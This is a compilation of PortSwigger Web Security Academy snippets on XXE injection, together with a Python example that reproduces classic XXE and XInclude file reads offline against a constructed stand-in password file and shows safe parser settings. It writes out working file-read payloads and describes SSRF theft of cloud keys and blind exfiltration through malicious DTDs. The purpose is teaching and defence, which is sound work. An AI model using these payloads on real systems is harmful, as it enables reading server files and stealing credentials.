XML external entity (XXE) injection - PortSwigger
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.
Lab: Exploiting XXE via image file upload - PortSwigger
Difficulty: Practitioner. This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
Lab: Exploiting XXE to perform SSRF attacks - PortSwigger
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.
What is a blind XXE attack? Tutorial & Examples - PortSwigger
What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.
Testing for XXE injection vulnerabilities with Burp Suite
Dec 19, 2024 · You can use Burp to test for XXE injection vulnerabilities: with Burp Suite Professional, use Burp Scanner to automatically flag potential vulnerabilities; use Burp Repeater to manually test for vulnerabilities, or to investigate any flagged vulnerabilities further.
Lab: Exploiting XInclude to retrieve files | Web Security Academy
Because you don't control the entire XML document, you can't define a DTD to launch a classic XXE attack. To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.
Lab: Exploiting XXE using external entities to retrieve files
Replace the productId number with a reference to the external entity: &xxe;. The response should contain "Invalid product ID:" followed by the contents of the /etc/passwd file.
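The two file-read techniques in the XInclude and external-entity lab entries above, reproduced offline in Python as an added example (this is not PortSwigger's lab or solution code). It assumes a constructed temp file standing in for /etc/passwd, a locally built "Check stock" document with a productId element, and Python's own xml.sax and xml.etree.ElementInclude as the parser; the helper names (parse_product_id, expand_xinclude, deny_all_loader, run_demo) are this example's. The SAX half parses the same document with external general entities disabled (Python's default since 3.7.1) and enabled, the latter being the vulnerable configuration that expands &xxe; into the file contents; the XInclude half shows why an injected xi:include works even though the attacker never controls the DOCTYPE, and a loader that refuses includes from untrusted input.

```python
"""Offline reproduction of the two file-read techniques in the lab entries above.

Added example, not PortSwigger's lab or solution code. A constructed temp file
stands in for /etc/passwd and the "Check stock" XML is built locally, so the
whole thing runs without a target. Function and element names are this
example's own.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Constructed stand-in for /etc/passwd; not a real password file.
SECRET = "root:x:0:0:root:/root:/bin/bash\ncarlos:x:1000:1000::/home/carlos:/bin/sh\n"
XI_NS = "http://www.w3.org/2001/XInclude"


def write_secret_file() -> str:
    """Create the stand-in secret file and return its absolute path."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET)
    return path


def classic_xxe_payload(secret_path: str) -> str:
    """Classic XXE: declare an external entity in the DTD, reference it in productId."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{secret_path}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


class _ProductIdCollector(ContentHandler):
    """Records the text of <productId>: what the app would echo back in its error."""

    def __init__(self) -> None:
        super().__init__()
        self.inside = False
        self.product_id = ""

    def startElement(self, name, attrs):
        self.inside = name == "productId"

    def endElement(self, name):
        if name == "productId":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.product_id += content


def parse_product_id(xml_text: str, resolve_external: bool) -> str:
    """Parse with xml.sax. resolve_external=True is the vulnerable configuration.

    Since Python 3.7.1 the SAX parser skips external general entities unless
    feature_external_ges is switched on; switching it on brings back the
    classic XXE file read. With the safe default, &xxe; expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = _ProductIdCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return collector.product_id


def xinclude_payload(secret_path: str) -> str:
    """XInclude injected into one field, for when the attacker cannot add a DTD.

    href is a bare path because ElementInclude's default loader calls open();
    against a Java parser the lab payload uses file:///etc/passwd instead.
    """
    return (
        "<stockCheck><productId>"
        f'<foo xmlns:xi="{XI_NS}"><xi:include parse="text" href="{secret_path}"/></foo>'
        "</productId><storeId>1</storeId></stockCheck>"
    )


def deny_all_loader(href, parse, encoding=None):
    """Hardened loader: refuse every include when the document is untrusted."""
    raise PermissionError(f"XInclude of {href!r} refused")


def expand_xinclude(xml_text: str, loader=None) -> str:
    """Run XInclude processing over the document and return productId's text."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root, loader=loader)  # default loader reads href from disk
    return "".join(root.find("productId").itertext())


def run_demo() -> dict:
    """Exercise all four configurations and return what each one leaked."""
    path = write_secret_file()
    try:
        results = {
            "sax_default": parse_product_id(classic_xxe_payload(path), False),
            "sax_external_ges": parse_product_id(classic_xxe_payload(path), True),
            "xinclude_default_loader": expand_xinclude(xinclude_payload(path)),
        }
        try:
            expand_xinclude(xinclude_payload(path), deny_all_loader)
            results["xinclude_denied"] = False
        except PermissionError:
            results["xinclude_denied"] = True
    finally:
        os.remove(path)
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

Running it prints the productId text each configuration produces: empty for the default SAX parser, the stand-in file for the parser with external general entities enabled and for XInclude with the default loader, and a refusal for the denying loader. The practical checks are the two safe settings: leave feature_external_ges off (or use a parser that never resolves external entities at all), and never run XInclude processing with a file-reading loader over a document that contains user input.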
Guide to XML entities with examples | Web Security Academy
In this section, we'll explain some key features of XML that are relevant to understanding XXE vulnerabilities. What is XML? XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a …
Lab: Exploiting blind XXE to exfiltrate data using a malicious …
Difficulty: Practitioner. This lab has a "Check stock" feature that parses XML input but does not display the result.
Lab: Blind XXE with out-of-band interaction - PortSwigger
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain. To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.